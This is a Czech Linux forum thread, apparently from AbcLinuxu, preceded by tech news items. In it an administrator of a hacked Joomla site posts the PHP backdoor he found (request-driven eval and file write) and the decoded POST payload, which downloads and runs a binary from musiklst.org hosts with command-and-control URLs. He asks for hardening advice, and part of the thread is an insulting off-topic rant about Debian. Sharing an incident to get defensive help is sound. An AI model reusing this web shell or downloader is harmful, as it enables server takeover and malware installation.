Apple představil (YouTube) telefony iPhone 17 Pro a iPhone 17 Pro Max, iPhone 17 a iPhone Air, sluchátka AirPods Pro 3 a hodinky Watch Series 11, Watch SE 3 a Watch Ultra 3.
Realtimová strategie Warzone 2100 (Wikipedie) byla vydána ve verzi 4.6.0. Podrobný přehled novinek, změn a oprav v ChangeLogu na GitHubu. Nejnovější verzi Warzone 2100 lze již instalovat také ze Snapcraftu a Flathubu.
Polské vývojářské studio CD Projekt Red publikovalo na Printables.com 3D modely z počítačové hry Cyberpunk 2077.
Organizátoři konference LinuxDays 2025 vydali program a zároveň otevřeli registrace. Akce se uskuteční 4. a 5. října na FIT ČVUT v pražských Dejvicích, kde vás čekají přednášky, workshopy, stánky a spousta šikovných lidí. Vstup na akci je zdarma.
Uživatelé komunikátoru Signal si mohou svá data přímo v Signalu bezpečně zálohovat a v případě rozbití nebo ztráty telefonu následně na novém telefonu obnovit. Zálohování posledních 45 dnů je zdarma. Nad 45 dnů je zpoplatněno částkou 1,99 dolaru měsíčně.
Server Groklaw, zaměřený na kauzy jako právní spory SCO týkající se Linuxu, skončil před 12 lety, resp. doména stále existuje, ale web obsahuje spam propagující hazardní hry. LWN.net proto v úvodníku připomíná důležitost zachovávání komunitních zdrojů a upozorňuje, že Internet Archive je také jen jeden.
Jakub Vrána vydal Adminer ve verzi 5.4.0: "Delší dobu se v Admineru neobjevila žádná závažná chyba, tak jsem nemusel vydávat novou verzi, až počet změn hodně nabobtnal."
V Německu slavnostně uvedli do provozu (en) nejrychlejší počítač v Evropě. Superpočítač Jupiter se nachází ve výzkumném ústavu v Jülichu na západě země, podle německého kancléře Friedricha Merze otevírá nové možnosti pro trénování modelů umělé inteligence (AI) i pro vědecké simulace. Superpočítač Jupiter je nejrychlejší v Evropě a čtvrtý nejrychlejší na světě (TOP500). „Chceme, aby se z Německa stal národ umělé inteligence,“ uvedl na
… více »V Berlíně probíhá konference vývojářů a uživatelů desktopového prostředí KDE Plasma Akademy 2025. Při té příležitosti byla oznámena alfa verze nové linuxové distribuce KDE Linux.
Byl vydán Debian 13.1, tj. první opravná verze Debianu 13 s kódovým názvem Trixie a Debian 12.12, tj. dvanáctá opravná verze Debianu 12 s kódovým názvem Bookworm. Řešeny jsou především bezpečnostní problémy, ale také několik vážných chyb. Instalační média Debianu 13 a Debianu 12 lze samozřejmě nadále k instalaci používat. Po instalaci stačí systém aktualizovat.
AbcLinuxu.cz
ITBiz.cz
HDmag.cz
AbcPráce.cz
$ietdgc = "8c8580370182a2d20127a69c5c7b1af6";
if(isset($_REQUEST['eosdzj']))
{ $wmbqhi = $_REQUEST['eosdzj'];
eval($wmbqhi); exit(); }
if(isset($_REQUEST['geokxjkd']))
{ $wwdqd = $_REQUEST['ulgidjx'];
$koayobr = $_REQUEST['geokxjkd'];
$lyuot = fopen($koayobr, 'w');
$zcawdru = fwrite($lyuot, $wwdqd);
fclose($lyuot);
echo $zcawdru;
exit(); }
todle šlo POSTem po otevření infikované stránky:eosdzj=%24p+%3d+array%5fkeys%28%24%5fREQUEST%29%3b+echo+%24%5fREQUEST%5b%24p%5b2%5d%5d%3b+eval%28base64%5fdecode%28%24%5fREQUEST%5b%24p%5b1%5d%5d%29%29%3b&p1=ZnVuY3Rpb24gZG93bmxvYWRGaWxlICgkdXJsLCAkcGF0aCkgewoKICAkbmV3Zm5hbWUgPSAkcGF0aDsKICAkZmlsZSA9IGZvcGVuICgkdXJsLCAicmIiKTsKICBpZiAoJGZpbGUpIHsKICAgICRuZXdmID0gZm9wZW4gKCRuZXdmbmFtZSwgIndiKyIpOwoKICAgIGlmICgkbmV3ZikKICAgIHdoaWxlKCFmZW9mKCRmaWxlKSkgewogICAgICBmd3JpdGUoJG5ld2YsIGZyZWFkKCRmaWxlLCAxMDI0ICogNjQgKSwgMTAyNCAqIDY0ICk7CiAgICB9CiAgfQoKICBpZiAoJGZpbGUpIHsKICAgIGZjbG9zZSgkZmlsZSk7CiAgfQoKICBpZiAoJG5ld2YpIHsKICAgIGZjbG9zZSgkbmV3Zik7CiAgfQogfQoKJG9zID0gcGhwX3VuYW1lKCdzJyk7CiR0eXBlID0gcGhwX3VuYW1lKCdtJyk7CgplY2hvICJQSFBfU1RBUlQiOwoKaWYgKCAhZnVuY3Rpb25fZXhpc3RzKHNoZWxsX2V4ZWMpICkKewoJZWNobyAibm9leGVjXG4iOwoJZWNobyAiUEhQX0VORCI7CglleGl0KDApOwp9CgppZiAoICRvcyAhPT0gIkxpbnV4IiApCnsKCWVjaG8gIk5vTGludXg6ICIuJG9zLiI8YnI%2bXG4iOwoJZWNobyAiUEhQX0VORCI7CglleGl0KDApOwp9CgoKCmlmICgkdHlwZSA9PSAieDg2XzY0IikgLy82NC1iaXQgb3MKewoJcHJpbnQgIng4Nl82NFxuIjsKCSRkdyA9ICJodHRwOi8vcGFnZXMubXVzaWtsc3Qub3JnL3BzNjQiOwoJJHBzID0gIi4vcHM2NCI7Cn0KZWxzZQp7CglwcmludCAiaTY4NlxuIjsKCSRkdyA9ICJodHRwOi8vcGFnZXMubXVzaWtsc3Qub3JnL3BzMzIiOwoJJHBzID0gIi4vcHMzMiI7Cn0KCiRwcyA9ICJwcyI7CgppZiAoIWZpbGVfZXhpc3RzKCRwcykpCnsKCWVjaG8gIkRvd25sb2FkICRkd1xuIjsKCWRvd25sb2FkRmlsZSgkZHcsICRwcyk7CgkvL0BmaWxlX3B1dF9jb250ZW50cygiJFBTIiwgQGZpbGVfZ2V0X2NvbnRlbnRzKCRkdykpOwp9CmVsc2UKewoJZWNobyAiRXhpc3RzICRwc1xuIjsKfQoKCmNobW9kICgkcHMsICIwNzU1Iik7CgokZW52ID0gIkJEVT1odHRwOi8vYnQyMi5tdXNpa2xzdC5vcmcvYXIxLnBocCBTSFU9aHR0cDovL3Nlby5tdXNpa2xzdC5vcmcvZ3UucGhwIFNLVT1odHRwOi8vc2VlazIyLm11c2lrbHN0Lm9yZy8gTElOPTYwMDAgREJOPWFmMDAxIjsKJGNtZCA9ICRlbnYuIiAuLyRwcyA%2bL2Rldi9udWxsIDI%2bL2Rldi9udWxsICYiOwokb3V0ID0gc2hlbGxfZXhlYygkY21kKTsKCnVubGluayAoJHBzKTsKCmVjaG8gIlBIUF9FTkQiOwo%3d&p2=b1946ac92492d2347c6235b4d2611184&shid=33338
snažil jsem se to rozluštit a dostal jsem z toho skript:
$p = array_keys($_REQUEST); echo $_REQUEST[$p[2]]; eval(base64_decode($_REQUEST[$p[1]]));a proměnná $p[1] obsahuje toto:
function downloadFile ($url, $path)
{ $newfname = $path; $file = fopen ($url, "rb");
if ($file) { $newf = fopen ($newfname, "wb+");
if ($newf) while(!feof($file))
{ fwrite($newf, fread($file, 1024 * 64 ), 1024 * 64 ); }
}
if ($file) { fclose($file); }
if ($newf) { fclose($newf); } }
$os = php_uname('s');
$type = php_uname('m');
echo "PHP_START";
if ( !function_exists(shell_exec) )
{ echo "noexec\n"; echo "PHP_END"; exit(0); }
if ( $os !== "Linux" ) { echo "NoLinux: ".$os."
\n";
echo "PHP_END";
exit(0);
}
if ($type == "x86_64") //64-bit os
{
print "x86_64\n";
$dw = "http://pages.musiklst.org/ps64";
$ps = "./ps64";
}
else
{
print "i686\n";
$dw = "http://pages.musiklst.org/ps32";
$ps = "./ps32";
}
$ps = "ps";
if (!file_exists($ps))
{
echo "Download $dw\n";
downloadFile($dw, $ps);
//@file_put_contents("$PS", @file_get_contents($dw));
}
else
{
echo "Exists $ps\n";
}
chmod ($ps, "0755");
$env = "BDU=http://bt22.musiklst.org/ar1.php SHU=http://seo.musiklst.org/gu.php SKU=http://seek22.musiklst.org/ LIN=6000 DBN=af001";
$cmd = $env." ./$ps >/dev/null 2>/dev/null &";
$out = shell_exec($cmd);
unlink ($ps);
echo "PHP_END";
)
podle data te infikovane stranky jsem našel asi 20 podobných, server jsem přeinstalil, nahodil modsecurity a v logu vidím pokusy o otevření (bývalých) infikovaných php stránek.
záznam POST mám ale jen pro tuhle infikovanou php stránku (úplně první kód nahoře), a to proto, že to po vykonání POST házelo error:
Apache-Error: [file "/build/buildd-php5_5.3.3-7+squeeze14-i386-lt_SZ2/php5-5.3.3/sapi/apache2handler/sapi_apache2.c"] [line 326] [level 3] PHP Notice: Use of undefined constant shell_exec - assumed 'shell_exec' in /var/www/stranky/libraries/joomla/http/index.php(1) : eval()'d code(1) : eval()'d code on line 28
Prosím, poraďte co ještě nastavit, abych maximálně ztížil další průniky.
Díky
1.4.2014 00:46
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Chtel jsem poradit, jestli treba nezakazat nektere php ficury, ktere jsou takle drsne zneuzitelne.V PHP je dost slabá hranice mezi nebezpečné a užitečné, často se to i překrývá.
31.3.2014 15:53
Josef Kufner | skóre: 70
1.4.2014 00:44
Jendа | skóre: 78
| blog: Jenda
| JO70FB
Prosím, poraďte co ještě nastavit, abych maximálně ztížil další průniky.
Předně je nezbytné změnit distribuci. Když člověk používá tu nejhorší, jaká je kde k nalezení, těžko se může divit následkům tohoto typu. Nikdo neví, kolik se v záměrně špatných distribucích skrývá problémů tohoto rozsahu.
…buildd-php5_5.3.3-7+squeeze14-i386-lt_SZ2…
Taky jsem to hledal…
Tak to je dobrá otázka. Ne, stále ještě mě neopustil ten zlozvyk říkat přesně to, co kolem sebe vidím, bez vytáček, bez politické korektnosti a bez snahy být zadobře se „všemi“ nebo s „většinou“.
Nelze si nevšimnout, že kdykoliv je v poradně dotaz, který řeší problémy se zoufale zastaralým softwarem, s nefunkčními balíčky (kvůli distribuci), s aktualizacemi systému nebo s bezpečností, v podstatě vždy takový dotaz někde obsahuje „Debilan Shitty“, „Debilan Crappy“ nebo nějakou podobnou „verzi“, případně „Blbuntu Stupid Moron“ a tak dále. V případě Ubuntu by se něco takového možná dalo svést na rozšířenost příslušné distribuce, ale v případě Debianu rozhodně ne. Hlavně je úsměvné, jak často Debian neustojí ani jednu jedinou aktualizaci systému (což je pro normální distribuce běžný proces, který by se měl dít asi tak jednou týdně nebo častěji) a jeho uživatel pak celý stroj přeinstaluje, místo Shitty tam dá Crappy a dostane se znova do naprosto stejné situace, jen posunuté v čase. 
Kdepak zloba — zkrátka jen říkám, co vidím.
Dokladuj prípady zlyhania aktualizácie debianu.
K tomu nemám důvod ani potřebu, i když by asi stačilo prohledat pár desítek dotazů z místní poradny. Kdo chce tu sračku používat, dobře mu tak. Proč bych mu něco dokládal?
Ich habe keine Probleme mit stable debian.Du nichts mochte lernen.
I Dont have a Problem with stable debian. You dont want to learn.
Co je to stable verze? Jak může mít systém sestávající z tisíců balíčků verzi? Z toho je naprosto jasné, že je něco špatně a že je třeba od takového systému utéct pryč.
Mimochodem, „stable“ neznamená nic jiného, než že tam jsou stabilní pět let staré bugy, které už nikdy nikdo neopraví. Děkuji, nechci. Používat 5 let staré technologie s 5 let starými bugy je na mě opravdu moc složité. Já používám pouze software, který je aktuální a který zkrátka funguje.
Z toho je naprosto jasné, že je něco špatně a že je třeba od takového systému utéct pryč.Your logic is flawed...
Mimochodem, „stable“ neznamená nic jiného, než že tam jsou stabilní pět let staré bugy, které už nikdy nikdo neopraví.To je lež, lež, lež.
Kdepak zloba — zkrátka jen říkám, co vidím.Halucinogeny jsou svinstvo. Zkus to bez nich a možná to bude lepší.
Nelze si nevšimnout, že kdykoliv je v poradně dotaz, který řeší problémy se zoufale zastaralým softwarem, s nefunkčními balíčky (kvůli distribuci), s aktualizacemi systému nebo s bezpečností, v podstatě vždy takový dotaz někde obsahuje „Debilan Shitty“, „Debilan Crappy“ nebo nějakou podobnou „verzi“, případně „Blbuntu Stupid Moron“ a tak dále. V případě Ubuntu by se něco takového možná dalo svést na rozšířenost příslušné distribuce, ale v případě Debianu rozhodně ne.
Na arch by mohol byť aj titulok : "Arch falling of the Cliff"
Předně je nezbytné změnit distribuci.Schovej si tyhle svoje bláboly někam mimo poradnu, jo? Děravou Joomlu opravdu změna distribuce nevyřeší. A co se týče odkazovaného problému - IIRC se vývojáři Debianu ptali v mailové konferenci vývojářů OpenSSL a ti tu (chybnou) změnu odsouhlasili s tím, že totéž udělají v upstreamu. Následně zjistili, že ne, ale nikomu v Debianu už to neřekli.
Vieš o tom, že archlinux v openVZ poriadne nefunguje.
Ako si predstavuješ bezpečnosť ? Vyzerá to tak, že nová verzia všetko rieši.
Mně stačí, že funguje v LXC. Navíc v ArchLinuxu v podstatě nikdy nepoužívám distribuční kernel, takže vlastně nevím, kde všude ArchLinux sám od sebe funguje a kde ne.
Na serverech často ArchLinux nemám, protože ne každý je fanouškem ArchLinuxu a u sdílených strojů je lepší mít systém, kterému s rozumnou pravděpodobností bude víc lidí rozumět. Proto zpravidla padne volba na Fedoru. U jednoho z předchozích zaměstnavatelů jsem měl dokonce desktop s Fedorou (zpočátku z povinnosti/nutnosti). Sice to nebyl můj oblíbený ArchLinux s custom kernelem a pár vychytávkami, ale co se týká spolehlivosti a rozumného implicitního nastavení, nemohl jsem si ten desktop vynachválit. Tedy nechápu ten intenzivní masochismus, který někoho přivede až k Debianu, ať už na desktopu nebo na serveru.
Problémy s bezpečností nemají jiné řešení než přechod na novou verzi. Jediná otázka je, jestli to bude nová verze přímo od tvůrců daného balíčku (což přesně v případě OpenSSL nelze než doporučit), nebo stokrát patchovaný paskvil, který se snaží opravit chybu a zároveň zůstat kompatibilní s nějakým zoufale zastaralým prostředím. Debian volí druhou možnost a jeho 32768 OpenSSL klíčů byl jeden z hvězdných výsledků tohoto přístupu k věci.
2.4.2014 10:22
Jendа | skóre: 78
| blog: Jenda
| JO70FB
mirror.vpsfree.cz:~# grep "connect from" /var/log/rsyncd ... 2012/08/08 08:32:54 [13520] connect from UNKNOWN (195.39.65.169) 2012/08/09 09:27:11 [15203] connect from UNKNOWN (195.39.65.169) 2012/08/10 12:28:49 [18338] connect from UNKNOWN (195.39.65.169) 2012/08/13 12:21:57 [30405] connect from UNKNOWN (195.39.65.169) 2012/08/14 10:13:22 [32294] connect from UNKNOWN (195.39.65.169) 2012/08/14 17:28:08 [432] connect from UNKNOWN (195.39.65.169) 2012/08/15 11:37:58 [1857] connect from UNKNOWN (195.39.65.169) 2012/08/21 17:19:28 [15359] connect from UNKNOWN (195.39.65.169) 2012/08/21 17:37:54 [15372] connect from UNKNOWN (195.39.65.169) 2012/08/21 17:38:36 [15373] connect from UNKNOWN (195.39.65.169) 2013/01/14 21:56:20 [19673] connect from node1a.prg.vpsfree.cz (77.93.223.10)
1.4.2014 08:30
MMMMMMMMM | skóre: 44
| blog: unstable
| Valašsko :-)
Ad. Josef Kufner: provozuju malý web pro neziskové sdružení, moje kvality poskytnutých služeb proto určitě postačují. Obávám se,že i kdybych provozoval web u hostingu, tak když se tam dostali přes mou joomlu, dostali by se tam i přes joomlu na hostingu.
Ad. Andrej: respektuju tvůj názor na Debian, ačkoli ho teda nesdílím. A tvůj příspěvek mi příjde trochu mimo, neptal jsem se na kvalitu distribuce. Něco jako bych já šel ná fórum škodovky, kde má někdo problém s převodovkou u suprbu a radil mu, že škodovka stojí za hojno, ať si raděj koupí dáčiju
Díky těm, co se snažili poradit.
Tiskni
Sdílej:
